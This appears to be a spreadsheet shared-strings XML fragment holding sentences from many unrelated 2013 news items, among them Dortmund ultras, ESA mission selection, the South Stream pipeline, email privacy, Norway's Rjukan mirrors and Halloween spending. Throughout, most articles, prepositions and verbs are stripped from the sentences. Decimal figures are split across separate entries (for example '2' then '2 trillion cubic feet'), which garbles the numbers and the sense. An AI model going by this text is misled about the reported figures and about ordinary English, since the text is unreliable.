    <t xml:space="preserve"> In central blocks south stand , blocks 12 13 , nothing moved </t>
  </si>
  <si>
    <t xml:space="preserve"> Even stadium announcer , Norbert Dickel , speaking successful results recent days - derby victory , win Arsenal , contract extension coach Jörgen klopp - raise spirits </t>
  </si>
  <si>
    <t xml:space="preserve"> Just five minutes kick-off , Capo climbed onto podium - tension almost tangible point , lifted large shout , Dickel asked shout section fans usual </t>
  </si>
  <si>
    <t xml:space="preserve"> As always , south stand left end , finally stand resumed usual role loudest section stadium </t>
  </si>
  <si>
    <t xml:space="preserve"> And soon vociferous request &amp;quot; derby winners stand &amp;quot; came south stand upon kick-off , everything back normal </t>
  </si>
  <si>
    <t xml:space="preserve"> The previous silence indeed reaction events previous days </t>
  </si>
  <si>
    <t xml:space="preserve"> Immediately local district derby FC Schalke 04 , travelling BVB fans fired flares crowds spectators onto pitch - almost hit goalkeeper Roman Weidenfeller </t>
  </si>
  <si>
    <t xml:space="preserve"> The kick-off delayed account chaotic scenes , As result , BVB Chairman Hans Joachim Watzke invited heads Dortmund Ultras fan group office - Watzke &amp;apos;s words believed , rather uncomfortable meeting fan representatives </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; There massive impact entire Ultra movement , &amp;quot; announced BVB Chairman Thursday evening panel discussion Frankfurt </t>
  </si>
  <si>
    <t xml:space="preserve"> As immediate measure , Watzke prohibited Ultras organising choreography home match VfB Stuttgart </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I banned , &amp;quot; explained </t>
  </si>
  <si>
    <t xml:space="preserve"> We cannot ignore zero tolerance policy regarding pyrotechnics Saxony </t>
  </si>
  <si>
    <t xml:space="preserve"> In addition , Ultras given option several different punishments - Tuesday decide one accept </t>
  </si>
  <si>
    <t xml:space="preserve"> Otherwise BVB impose sanction end next week , said Watzke </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It severe , &amp;quot; assured Watzke </t>
  </si>
  <si>
    <t xml:space="preserve"> It interesting see reactions south stand </t>
  </si>
  <si>
    <t xml:space="preserve"> In October , number jobless fell slightly 22 , total 1,307 </t>
  </si>
  <si>
    <t xml:space="preserve"> The rate 3</t>
  </si>
  <si>
    <t xml:space="preserve">1 per cent indeed better previous year also better September , &amp;quot; however , hoped , &amp;quot; said Monika Felder-Bauer , acting branch manager Employment Agency Sonthofen </t>
  </si>
  <si>
    <t xml:space="preserve"> Stating reason , Felder-Bauer said: &amp;quot; We barely skilled workers fields skilled crafts trades , healthcare geriatric care </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Seasonal job offers staff hotel restaurant businesses coming since September </t>
  </si>
  <si>
    <t xml:space="preserve"> The Winter season within industry begins mid-December </t>
  </si>
  <si>
    <t xml:space="preserve"> The complete background report found &amp;quot; Allgäuer Anzeigeblatt &amp;quot; newspaper dated 31 / 10 / 2013 (page 33)</t>
  </si>
  <si>
    <t xml:space="preserve"> Tony Blair said &amp;apos;d seize chance return Britain &amp;apos;s prime minister - acknowledges comeback unlikely </t>
  </si>
  <si>
    <t xml:space="preserve"> In interview overnight mark fifth anniversary departure office , 59-year-old aired views various domestic policies </t>
  </si>
  <si>
    <t xml:space="preserve"> Since stood June 2007 decade leader , Mr Blair largely avoided discussing British politics , confining comments foreign affairs role envoy Quartet Middle East peacemakers </t>
  </si>
  <si>
    <t xml:space="preserve"> Asked would return post prime minister , Mr Blair quoted London &amp;apos;s Evening Standard saying: &amp;quot; Yes , sure , &amp;apos;s likely happen , </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; ESA makes decision major space missions: Missions costing billions Distant planets , gravitational waves black holes - experts European Space Agency must agree two major projects launched coming years </t>
  </si>
  <si>
    <t xml:space="preserve"> There 30 proposals choose , five still running </t>
  </si>
  <si>
    <t xml:space="preserve"> Distant worlds </t>
  </si>
  <si>
    <t xml:space="preserve"> Astronomers already found 1,000 planets near stars </t>
  </si>
  <si>
    <t xml:space="preserve"> Whether life exists least , no-one knows </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> For &amp;quot; Cosmic Vision &amp;quot; programme , looking ideas two major space projects , greatly advance research </t>
  </si>
  <si>
    <t xml:space="preserve"> The budget &amp;quot; L-Missions &amp;quot; lies around one billion Euro </t>
  </si>
  <si>
    <t xml:space="preserve"> The projects planned start 2028 2034 </t>
  </si>
  <si>
    <t xml:space="preserve"> At beginning September , elite field European space research met Paris discuss proposals missions </t>
  </si>
  <si>
    <t xml:space="preserve"> 30 ideas debate , five made onto short list </t>
  </si>
  <si>
    <t xml:space="preserve"> Numerous panels assessing proposals , posing questions researchers </t>
  </si>
  <si>
    <t xml:space="preserve"> Over coming days , final decision made Scientific Programme Committee </t>
  </si>
  <si>
    <t xml:space="preserve"> In total , four main questions chosen ESA , missions &amp;quot; Cosmic Vision &amp;quot; programme , initiated 2007 , find answers </t>
  </si>
  <si>
    <t xml:space="preserve"> What conditions required formation planets life ? The precise processes formation stars large gas clouds - thus formation planets orbit stars - lie proverbial darkness </t>
  </si>
  <si>
    <t xml:space="preserve"> A large infra-red telescope space could penetrate darkness </t>
  </si>
  <si>
    <t xml:space="preserve"> And star planets , circumstances life exist ? In order pursue question , &amp;quot; Cheops &amp;quot; space telescope launched 2017 , 500 known planetary systems proximity us investigated greater detail </t>
  </si>
  <si>
    <t xml:space="preserve"> The possibilities , however , limited - Cheops small mission budget 150 million Euro </t>
  </si>
  <si>
    <t xml:space="preserve"> With larger instruments , astronomers could map planets similar Earth even analyse composition atmospheres , thus search &amp;quot; biomarkers &amp;quot;: gases serve indicator biological activity </t>
  </si>
  <si>
    <t xml:space="preserve"> How solar system function ? This question also provide information regarding preconditions origins life </t>
  </si>
  <si>
    <t xml:space="preserve"> The magnetic activity star , interaction magnetic field emitted particle radiation play important role </t>
  </si>
  <si>
    <t xml:space="preserve"> It possible investigate processes solar system , serve example applied elsewhere </t>
  </si>
  <si>
    <t xml:space="preserve"> With &amp;quot; Solar Orbiter &amp;quot; , ESA already approved M-class mission (for budget stands around half million Euro) address matter </t>
  </si>
  <si>
    <t xml:space="preserve"> The probe launched 2017 closely observe surface activity sun </t>
  </si>
  <si>
    <t xml:space="preserve"> Jupiter moons also great interest researchers </t>
  </si>
  <si>
    <t xml:space="preserve"> They want find role giant planet played development solar system </t>
  </si>
  <si>
    <t xml:space="preserve"> The ESA planning first total three L-Missions &amp;quot; Cosmic Vision &amp;quot; programme address subject </t>
  </si>
  <si>
    <t xml:space="preserve"> The &amp;quot; Juice &amp;quot; (Jupiter Icy Moons Explorer) probe planned begin journey 2022 </t>
  </si>
  <si>
    <t xml:space="preserve"> Eight years later reach Jupiter investigate atmosphere planet well icy moons Europa , Callisto Ganymede </t>
  </si>
  <si>
    <t xml:space="preserve"> What basic physical laws Universe ? Outer space offers many possibilities studying substances extreme conditions thus examining whether laws nature , known us , still valid </t>
  </si>
  <si>
    <t xml:space="preserve"> There may also deviations could show physicians path new theory , umbrella known natural laws could united </t>
  </si>
  <si>
    <t xml:space="preserve"> How universe come consist ? 13</t>
  </si>
  <si>
    <t xml:space="preserve">7 billion years ago , cosmos created Big Bang </t>
  </si>
  <si>
    <t xml:space="preserve"> Alongside materials familiar us , stars , planets life forms composed , exists dark matter , gravitational force holds galaxies galaxy clusters together , dark energy , effects accelerate expansion universe </t>
  </si>
  <si>
    <t xml:space="preserve"> Thus far , researchers know neither physical laws applied initial moments Big Bang , dark matter dark energy consist </t>
  </si>
  <si>
    <t xml:space="preserve"> With &amp;quot; Euclid &amp;quot; , ESA already approved M-mission , planned commence 2020 </t>
  </si>
  <si>
    <t xml:space="preserve"> With special telescope , probe examine distribution material universe across entire sky , thus enabling conclusions drawn regarding properties dark matter dark energy </t>
  </si>
  <si>
    <t xml:space="preserve"> Proposals running </t>
  </si>
  <si>
    <t xml:space="preserve"> Of 30 proposals , two remain end selection procedure </t>
  </si>
  <si>
    <t xml:space="preserve"> The proposal best chance approval L-mission , opinion many experts , &amp;quot; E-Lisa &amp;quot; , demanding concept aims prove existence gravitational waves </t>
  </si>
  <si>
    <t xml:space="preserve"> Many physicians perceive entail changes structure space-time , Albert Einstein predicted almost 100 years ago </t>
  </si>
  <si>
    <t xml:space="preserve"> To date never proved exist </t>
  </si>
  <si>
    <t xml:space="preserve"> The scientists behind project hope Elisa could achieve </t>
  </si>
  <si>
    <t xml:space="preserve"> The mission involves placing detector , consisting two three probes , outer space </t>
  </si>
  <si>
    <t xml:space="preserve"> Unlike systems Earth , could also prove gravitational waves created Big Bang , thus provide fresh knowledge regarding origin cosmos </t>
  </si>
  <si>
    <t xml:space="preserve"> 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 </t>
  </si>
  <si>
    <t xml:space="preserve"> Among others , proposals already ruled include proposals bringing samples back Mars , conducting research moon , Venus asteroids , well proposals area solar physics </t>
  </si>
  <si>
    <t xml:space="preserve"> Gazprom &amp;apos;s Alexei Miller says pipeline Bulgaria starts new gas era The start construction South Stream gas pipeline Bulgaria marks launch one Europe &amp;apos;s largest energy projects , Gazprom &amp;apos;s chief said </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; A landmark event taken place today: Construction started Bulgarian section South Stream gas pipeline , large-scale important project Europe , &amp;quot; Gazprom Chairman Alexei Miller said statement Thursday </t>
  </si>
  <si>
    <t xml:space="preserve"> This project key element energy security whole European continent </t>
  </si>
  <si>
    <t xml:space="preserve"> South Stream meant add diversity Russia &amp;apos;s export routes Europe </t>
  </si>
  <si>
    <t xml:space="preserve"> A contractual dispute Gazprom counterparts Ukraine , hosts Russia &amp;apos;s gas Europe , adds layer risk conventional routes , officials say </t>
  </si>
  <si>
    <t xml:space="preserve"> Miller said direct connection Bulgaria , member European Union , means geopolitical risks associated transit countries eliminated &amp;quot; forever </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Bulgarian consumers receive gas South Stream discounted rate entire project starts operating 2015 </t>
  </si>
  <si>
    <t xml:space="preserve"> Gazprom said construction begin downstream countries year &amp;apos;s end </t>
  </si>
  <si>
    <t xml:space="preserve"> The pipeline designed annual capacity 2</t>
  </si>
  <si>
    <t xml:space="preserve">2 trillion cubic feet natural gas </t>
  </si>
  <si>
    <t xml:space="preserve"> Falkenberg club makes two wonderful evenings </t>
  </si>
  <si>
    <t xml:space="preserve"> The new season Falkenberg &amp;quot; Blue Velvet &amp;quot; club begun </t>
  </si>
  <si>
    <t xml:space="preserve"> This Friday evening , &amp;quot; Pump party &amp;quot; event taking place , one day later , Saturday evening , festivities continue over-25s party </t>
  </si>
  <si>
    <t xml:space="preserve"> Fat beats cool sounds course promised organisers nights </t>
  </si>
  <si>
    <t xml:space="preserve"> Pamela Anderson chops iconic blonde locks , debuts dramatic new pixie cut </t>
  </si>
  <si>
    <t xml:space="preserve"> Pam &amp;apos;s blonde locks made famous role sexy TV show Baywatch </t>
  </si>
  <si>
    <t xml:space="preserve"> Pamela Anderson latest celebrity shock fans dramatic new hairdo </t>
  </si>
  <si>
    <t xml:space="preserve"> The ex-Baywatch babe ditched long blonde locks favour platinum pixie crop </t>
  </si>
  <si>
    <t xml:space="preserve"> It &amp;apos;s first time 20 years blonde beauty short hair , &amp;apos;re loving demure change </t>
  </si>
  <si>
    <t xml:space="preserve"> What think Pammy &amp;apos;s hair ? Share us thoughts comments </t>
  </si>
  <si>
    <t xml:space="preserve"> Thus far , Kempten Police Department look back calm Halloween night </t>
  </si>
  <si>
    <t xml:space="preserve"> The authorities called twice deal children throwing eggs houses </t>
  </si>
  <si>
    <t xml:space="preserve"> Because home owners realised immediately , egg remnants could cleaned , meaning material damage occurred </t>
  </si>
  <si>
    <t xml:space="preserve"> Furthermore , town centre area , fireworks set , material damage caused either </t>
  </si>
  <si>
    <t xml:space="preserve"> The residents Bischof-Freundorfer-Weg reported car wrapped toilet paper wheel trims stolen </t>
  </si>
  <si>
    <t xml:space="preserve"> However , man found wheel trims nearby prior police arriving , account police involvement required </t>
  </si>
  <si>
    <t xml:space="preserve"> Town Council delighted solid budget Every time discussion Town Council meetings turns budget , Mayor Ralph Gerster good reason smile </t>
  </si>
  <si>
    <t xml:space="preserve"> The municipality coffers Herdwangen-Schönach well stocked administration debt-free since 2005 </t>
  </si>
  <si>
    <t xml:space="preserve"> In sense , 2012 budgetary year , also recorded complete success </t>
  </si>
  <si>
    <t xml:space="preserve"> This became clear upon presentation annual accounts 2012 </t>
  </si>
  <si>
    <t xml:space="preserve"> As Andrea Rothmund explained , administrative budget came EUR one million higher originally planned , around 7</t>
  </si>
  <si>
    <t xml:space="preserve">6 million Euro </t>
  </si>
  <si>
    <t xml:space="preserve"> The administrative budget surplus , around EUR 1</t>
  </si>
  <si>
    <t xml:space="preserve">8 million , also stood around EUR one million projections </t>
  </si>
  <si>
    <t xml:space="preserve"> The surplus primarily due higher trade tax income local authorities &amp;apos; contribution towards income tax </t>
  </si>
  <si>
    <t xml:space="preserve"> The capital budget also stood well projected values </t>
  </si>
  <si>
    <t xml:space="preserve"> Instead projected EUR 1</t>
  </si>
  <si>
    <t>5 million Euro , value last year EUR 2</t>
  </si>
  <si>
    <t xml:space="preserve">5 million </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; This mainly due higher contribution administrative budget , &amp;quot; said Rothmund </t>
  </si>
  <si>
    <t xml:space="preserve"> Because fewer investments made 2012 budgetary year planned , reserves also came higher </t>
  </si>
  <si>
    <t xml:space="preserve"> In total , managed increase general contingency reserves around EUR 2</t>
  </si>
  <si>
    <t>1 million , total EUR 4</t>
  </si>
  <si>
    <t xml:space="preserve">9 million </t>
  </si>
  <si>
    <t xml:space="preserve"> Mayor Ralph Gerster thanked Rothmund team good work </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; A job like something achieve overnight , &amp;quot; said Gerster praise annual financial statement </t>
  </si>
  <si>
    <t xml:space="preserve"> He Town Councillors clearly delighted good figures </t>
  </si>
  <si>
    <t xml:space="preserve"> It may sound like paradox , precisely good figures could soon work expensive citizens </t>
  </si>
  <si>
    <t xml:space="preserve"> In past , good financial situation meant local authorities could away high municipal rates </t>
  </si>
  <si>
    <t xml:space="preserve"> However , according Gerster , time time resulted subsidies reduced state </t>
  </si>
  <si>
    <t xml:space="preserve"> There prerequisites must fulfilled order receive subsidies various compensation elements </t>
  </si>
  <si>
    <t xml:space="preserve"> Among requirements , towns municipalities applying subsidies must levy certain municipal rates </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We address subject municipal rates , investments made coming years could subsidies , &amp;quot; commented Gerster regarding matter </t>
  </si>
  <si>
    <t xml:space="preserve"> Sleepless New York On way host families Weymouth , Massachusetts , pupils Schwarzwald Grammar School got know American city New York </t>
  </si>
  <si>
    <t xml:space="preserve"> After eight-hour flight , headed straight Brooklyn Bridge , via heart city , Manhattan , reached foot </t>
  </si>
  <si>
    <t xml:space="preserve"> From fascinating view world-famous skyline , particularly impressive evening light </t>
  </si>
  <si>
    <t xml:space="preserve"> Due time difference , pupils go almost 24 hours , however , true slogan , &amp;quot; city never sleeps &amp;quot; , day rounded trip Times Square </t>
  </si>
  <si>
    <t xml:space="preserve"> In spite shutdown , able visit Statue Liberty second day , climb statue foot </t>
  </si>
  <si>
    <t xml:space="preserve"> They moved Financial District , via Wall Street , visit 9 / 11 memorial </t>
  </si>
  <si>
    <t xml:space="preserve"> On third day , pupils able take overview fascinating city viewing platform Empire State Building , enjoying views height 373 metres </t>
  </si>
  <si>
    <t xml:space="preserve"> They made way hustle bustle New York streets , via Rockerfeller Center , Central Park , provided perfect opportunity rest Autumn sun </t>
  </si>
  <si>
    <t xml:space="preserve"> Following short flight New York Boston , pupils arrived host families experiencing school day Weymouth High School </t>
  </si>
  <si>
    <t xml:space="preserve"> What happens e-mail transit ? E-mail short electronic mail </t>
  </si>
  <si>
    <t xml:space="preserve"> Are technical measures maintain privacy correspondence , similar traditional postal service , implemented design Internet-based service ? When designing early Internet services , focus lay making communication possible </t>
  </si>
  <si>
    <t xml:space="preserve"> Thus , developing underlying technical protocols , attention given creating stable foundation interception-proof exchange mail </t>
  </si>
  <si>
    <t xml:space="preserve"> For reason , traditional email like open postcard sealed letter </t>
  </si>
  <si>
    <t xml:space="preserve"> When user &amp;quot; Anna &amp;quot; sends email &amp;quot; Benni &amp;quot; , pair &amp;apos;s computers directly connected ? Anna &amp;apos;s email program browser first sends mail service provider &amp;apos;s mail server </t>
  </si>
  <si>
    <t xml:space="preserve"> If Gmail account , example , would Google </t>
  </si>
  <si>
    <t xml:space="preserve"> This mail server sends content provider Benni uses </t>
  </si>
  <si>
    <t xml:space="preserve"> En route , mail pass number servers Internet </t>
  </si>
  <si>
    <t xml:space="preserve"> Benni call content provider </t>
  </si>
  <si>
    <t xml:space="preserve"> Are traditional e-mails read third parties journey net ? The majority e-mails read several times software robots en route recipient </t>
  </si>
  <si>
    <t xml:space="preserve"> Checks generally carried sender &amp;apos;s provider whether mail contains malware attachment </t>
  </si>
  <si>
    <t xml:space="preserve"> A virus check also carried recipient systems </t>
  </si>
  <si>
    <t xml:space="preserve"> In addition , providers check whether nuisance unwanted spam mail , deleted immediately least sorted spam folder </t>
  </si>
  <si>
    <t xml:space="preserve"> Do robots tasks ? In case systems Gmail , robots also identify information Google requires displaying context-based advertising </t>
  </si>
  <si>
    <t xml:space="preserve"> If Anna Benni communicate upcoming holiday travels via Gmail , Google display corresponding links holiday offers </t>
  </si>
  <si>
    <t xml:space="preserve"> Do unknown individuals also read e-mails ? The probability unauthorised persons reading mail extremely low </t>
  </si>
  <si>
    <t xml:space="preserve"> However , theoretically , possible </t>
  </si>
  <si>
    <t xml:space="preserve"> Within companies , administrators often able read electronic mail sent </t>
  </si>
  <si>
    <t xml:space="preserve"> Law enforcement authorities Secret Services also legal authorisation intercept take note e-mails </t>
  </si>
  <si>
    <t xml:space="preserve"> This may include potential illegal spying activities </t>
  </si>
  <si>
    <t xml:space="preserve"> Is possible protect e-mails read ? With encryption using OpenPGP standard , e-mail effectively protected read </t>
  </si>
  <si>
    <t xml:space="preserve"> With great technical effort , also possible conceal metadata email communication even possible tell communicating </t>
  </si>
  <si>
    <t xml:space="preserve"> How important Yahoo Google within e-mail market Germany ? According study conducted Convios Consulting August 2013 , among main mail services private use , Yahoo Google play minor role </t>
  </si>
  <si>
    <t xml:space="preserve"> While number Yahoo Mail accounts fallen recently , Google &amp;apos;s Gmail managed grow considerably </t>
  </si>
  <si>
    <t xml:space="preserve"> Konstanz: Road block following accident Schänzle roundabout According police , accident occurred 51-year-old driver Swiss Seat Ibiza travelling town left lane two-lane Reichenaustrasse </t>
  </si>
  <si>
    <t xml:space="preserve"> Shortly Schänzle roundabout noticed left-turn lane going direction Stromeyersdorfstraße moved across right lane </t>
  </si>
  <si>
    <t xml:space="preserve"> In , collided BMW 23-year-old Konstanz resident , travelling lane </t>
  </si>
  <si>
    <t xml:space="preserve"> The VW Passat 19-year-old driver travelling behind BMW also damaged </t>
  </si>
  <si>
    <t xml:space="preserve"> In total , EUR 15,000 material damage caused , announced police </t>
  </si>
  <si>
    <t xml:space="preserve"> The road blocked accident investigated , statement continued </t>
  </si>
  <si>
    <t xml:space="preserve"> Norway: Norwegian village lights huge mirrors Using huge mirrors , residents Norwegian village brought light dreary valley </t>
  </si>
  <si>
    <t xml:space="preserve"> Due low level sunshine , autumn spring village Rjukan Vestfjord valley normally languishes shadows surrounding mountains </t>
  </si>
  <si>
    <t xml:space="preserve"> With three gigantic mirrors , 45 metres tall , centuries-old dream came true Wednesday </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Finally ! &amp;apos; , raved Mayor Steinar Bergsland inaugural ceremony , televised broadcaster TV2 </t>
  </si>
  <si>
    <t xml:space="preserve"> Some valley residents lay back sun loungers , others safely put sunglasses </t>
  </si>
  <si>
    <t xml:space="preserve"> Up , hungry sunshine winter travel nearby peak cable car </t>
  </si>
  <si>
    <t xml:space="preserve"> Ten years ago , local artist Martin Andersen presented proposal directing sun valley using mirrors </t>
  </si>
  <si>
    <t xml:space="preserve"> However , basic idea talked location since 1913 </t>
  </si>
  <si>
    <t xml:space="preserve"> After several years debate , Town Council finally approved project , cost 5 million krone (around EUR 615,000)</t>
  </si>
  <si>
    <t xml:space="preserve"> A similar construction provided sunshine Italian alpine resort Viganella number years </t>
  </si>
  <si>
    <t xml:space="preserve"> Electricity become expensive Pfullendorf The citizens Pfullendorf adjust high electricity costs </t>
  </si>
  <si>
    <t xml:space="preserve"> As Managing Director municipal energy company , Jörg-Arne Bias , confirmed SÜDKURIER , families four Pfullendorf receiving end price increase EUR 70 90 per year </t>
  </si>
  <si>
    <t xml:space="preserve"> One major reason upcoming price increase rise so-called EEC Levy 5</t>
  </si>
  <si>
    <t>277 6</t>
  </si>
  <si>
    <t xml:space="preserve">3 Cents per kilowatt hour </t>
  </si>
  <si>
    <t xml:space="preserve"> This levy reset four operators large power grids , October year </t>
  </si>
  <si>
    <t xml:space="preserve"> They estimate additional costs incur result &amp;quot; energy turnaround &amp;quot; , able recover means levy price electricity </t>
  </si>
  <si>
    <t xml:space="preserve"> The Pfullendorf municipal energy company forms last link chain </t>
  </si>
  <si>
    <t xml:space="preserve"> In projections , supervisory council energy company even assumed levy higher reported Jörg-Arne Bias </t>
  </si>
  <si>
    <t xml:space="preserve"> The specific figures must calculated municipal energy cmpany inform customers precise price increase next week </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We working assumption increase 1 cent plus x , &amp;quot; said Bias , figure likely closer 2 cents </t>
  </si>
  <si>
    <t xml:space="preserve"> Beautiful animals delicious tarts entice The beautiful rabbits various breeds colourings presented District Exhibition weekend community centre </t>
  </si>
  <si>
    <t xml:space="preserve"> The evaluations already made Thursday </t>
  </si>
  <si>
    <t xml:space="preserve"> Once , W514 local association organising large exhibition </t>
  </si>
  <si>
    <t xml:space="preserve"> Here breeders clubs District Soest exhibiting best animals , young private individuals Wickeder also showing rabbits </t>
  </si>
  <si>
    <t xml:space="preserve"> On Thursday , six adjudicators assessed numerous rabbits able assign awards exceptional animals </t>
  </si>
  <si>
    <t xml:space="preserve"> The visitors show kept well informed , evaluations animals posted cages </t>
  </si>
  <si>
    <t xml:space="preserve"> Mayor Hermann Arndt officially opening exhibition 14: 30 </t>
  </si>
  <si>
    <t xml:space="preserve"> The rabbit show , however , open visitors 10: 00 a</t>
  </si>
  <si>
    <t xml:space="preserve"> Saturday 10: 00 a</t>
  </si>
  <si>
    <t xml:space="preserve"> Sunday , followed prize ceremony </t>
  </si>
  <si>
    <t xml:space="preserve"> Guests also invited take part tombola impressive prizes sample delicious food cafeteria </t>
  </si>
  <si>
    <t xml:space="preserve"> Iran satisfied nuclear negotiations process Iran expressed satisfaction negotiation process , one week next nuclear meeting five UN veto powers Germany </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; After many years , reached agreement International Nuclear Energy Authorities clear differences past years , &amp;quot; wrote Foreign Minister Mohammed Dschawad Sarif Facebook page </t>
  </si>
  <si>
    <t xml:space="preserve"> It without doubt long path , chief nuclear negotiator satisfied negotiation process also optimistic sides come solution end </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> Following visit Nuclear Bunker Museum , focus turn Haigerloch period 1850 , Haigerloch came Prussian rule </t>
  </si>
  <si>
    <t xml:space="preserve"> The crowning glory visit Abendmahlskirche </t>
  </si>
  <si>
    <t xml:space="preserve"> There participants tour told story construction church gain insight development Protestant congregation , Catholic area </t>
  </si>
  <si>
    <t xml:space="preserve"> Last least , church eyes also turn last supper painting , painted Friedrich Schüz support Walter Kröll Georg Halbritter </t>
  </si>
  <si>
    <t xml:space="preserve"> It faithful reproduction famous work Leonardo da Vinci Milan </t>
  </si>
  <si>
    <t xml:space="preserve"> The meeting point one half hour tour Nuclear Bunder Museum , 3: 00 p</t>
  </si>
  <si>
    <t xml:space="preserve"> Tickets available ticket office Nuclear Bunker Museum </t>
  </si>
  <si>
    <t xml:space="preserve"> The Haigerloch Town Tourist Office available questions provide information </t>
  </si>
  <si>
    <t xml:space="preserve"> China plea paper &amp;apos; overhauled &amp;apos; A Chinese newspaper made front-page appeal release reporter accused defamation overhauled , press regulator says </t>
  </si>
  <si>
    <t xml:space="preserve"> The Guangzhou-based New Express made rare public plea release journalist Chen Yongzhou </t>
  </si>
  <si>
    <t xml:space="preserve"> But Mr Chen subsequently admitted television taken bribes fabricate stories part state-owned company </t>
  </si>
  <si>
    <t xml:space="preserve"> Now New Express undergo &amp;quot; full rectification , &amp;quot; regulator said </t>
  </si>
  <si>
    <t xml:space="preserve"> The &amp;quot; rectification &amp;quot; order came Guangdong Administration Press Publication , Radio , Film Television </t>
  </si>
  <si>
    <t xml:space="preserve"> A preliminary investigation showed Yangcheng Evening News Group &amp;apos;s New Express published several untrue reports listed company Zoomlion period September 2012 August 2013 </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; New Express &amp;apos;s editorial management disordered , &amp;quot; regulator said statement </t>
  </si>
  <si>
    <t xml:space="preserve"> It said decided &amp;quot; impose administrative penalty Chen Yongzhou revoking reporter &amp;apos;s license </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It also &amp;quot; instructed Yangcheng Evening News Group undertake complete rectification New Express , recommended investigate relevant responsible persons New Express immediately revise New Express &amp;apos;s leadership team </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Mr Chen wrote several articles New Express alleging financial irregularities construction-equipment company called Zoomlion </t>
  </si>
  <si>
    <t xml:space="preserve"> After detained , newspaper published two front-page appeals release , saying backed journalism </t>
  </si>
  <si>
    <t xml:space="preserve"> But Mr Chen appeared state television admitting published false stories money </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; In case I &amp;apos;ve caused damages Zoomlion also whole news media industry ability earn public &amp;apos;s trust , &amp;quot; told state broadcaster CCTV </t>
  </si>
  <si>
    <t xml:space="preserve"> I mainly I hankered money fame </t>
  </si>
  <si>
    <t xml:space="preserve"> I &amp;apos;ve realised wrongdoing </t>
  </si>
  <si>
    <t xml:space="preserve"> Following Mr Chen &amp;apos;s apology , New Express issued front-page apology , saying failed properly check reports </t>
  </si>
  <si>
    <t xml:space="preserve"> Experts say confessions still routinely coerced , despite change law earlier year banning authorities forcing anyone incriminate </t>
  </si>
  <si>
    <t xml:space="preserve"> Traffic lights permanently red: observe waiting time Sometimes traffic light simply never turns green </t>
  </si>
  <si>
    <t xml:space="preserve"> The contact loop road react , light defective </t>
  </si>
  <si>
    <t xml:space="preserve"> What - drive red ? If affected person waited sufficiently long period time red light , provided crossing clear , drive , explained Stuttgart-based lawyer Ralf Becker &amp;quot; Motorrad &amp;quot; (Motorcycle) magazine </t>
  </si>
  <si>
    <t xml:space="preserve"> The waiting time must , however , &amp;quot; appropriate &amp;quot; , interpreted differently case-to-case basis </t>
  </si>
  <si>
    <t xml:space="preserve"> Becker advises wait least five minutes fault traffic lights assumed </t>
  </si>
  <si>
    <t xml:space="preserve"> Anyone drives spite red light must , however , aware / fully liable resulting accident </t>
  </si>
  <si>
    <t xml:space="preserve"> Anyone waits less five minutes , certain circumstances , waited long enough , warned Becker , referring ruling Hamm Higher Regional Court </t>
  </si>
  <si>
    <t xml:space="preserve"> In case question , driver ignored light permanently red around three minutes held responsible negligently jumping red light </t>
  </si>
  <si>
    <t xml:space="preserve"> The traffic lights actually defective , rather turned green minutes later </t>
  </si>
  <si>
    <t xml:space="preserve"> He spared driving ban account special circumstances - spared fine </t>
  </si>
  <si>
    <t xml:space="preserve"> Halloween 2013: By Numbers When I little , Halloween magical </t>
  </si>
  <si>
    <t xml:space="preserve"> My sister I allowed eat candy , stay late play dress-up neighborhood </t>
  </si>
  <si>
    <t xml:space="preserve"> Nowadays , I &amp;apos;ve become scrooge </t>
  </si>
  <si>
    <t xml:space="preserve"> I &amp;apos;t signed past two years give candy apartment probably &amp;apos;t year </t>
  </si>
  <si>
    <t xml:space="preserve"> But stats show I &amp;apos;m black sheep comes Halloween </t>
  </si>
  <si>
    <t xml:space="preserve"> The majority Americans - 158 million fact - celebrating Halloween year , spending total $ 6</t>
  </si>
  <si>
    <t xml:space="preserve">9 billion candy , costumes decorations , according National Retail Federation </t>
  </si>
  <si>
    <t xml:space="preserve"> One thing I look forward every Halloween trends </t>
  </si>
  <si>
    <t xml:space="preserve"> Costumes expected account $ 1</t>
  </si>
  <si>
    <t>2 billion dollars $ 6</t>
  </si>
  <si>
    <t xml:space="preserve">9 billion spent , according NRF </t>
  </si>
  <si>
    <t xml:space="preserve"> This year , sexy inanimate objects rage </t>
  </si>
  <si>
    <t xml:space="preserve"> Women &amp;apos;t sexy professionals anymore; also sexy foods like pizza , hamburgers carrots </t>
  </si>
  <si>
    <t xml:space="preserve"> As men , I expect seeing lot zombies , thanks The Walking Dead I &amp;apos;ll bet Daft Punk space men make Instagram feeds year </t>
  </si>
  <si>
    <t xml:space="preserve"> According Google , highest searched costumes zombies , Batman , pirates witches </t>
  </si>
  <si>
    <t xml:space="preserve"> I guess &amp;apos;s nothing wrong going traditional </t>
  </si>
  <si>
    <t xml:space="preserve"> We dressed dogs last year amazement alone </t>
  </si>
  <si>
    <t xml:space="preserve"> In fact , Americans spend $ 330 million pet costumes year , according NRF </t>
  </si>
  <si>
    <t xml:space="preserve"> That &amp;apos;s lot ironic hotdog dogs </t>
  </si>
  <si>
    <t xml:space="preserve"> When comes candy , &amp;apos;t screw around </t>
  </si>
  <si>
    <t xml:space="preserve"> Americans spend $ 1</t>
  </si>
  <si>
    <t xml:space="preserve">9 billion year , according The Nielsen Company </t>
  </si>
  <si>
    <t xml:space="preserve"> That &amp;apos;s around 600 million pounds worth Hershey bars , lollipops , Milk Duds , Twizzlers Clark Bars </t>
  </si>
  <si>
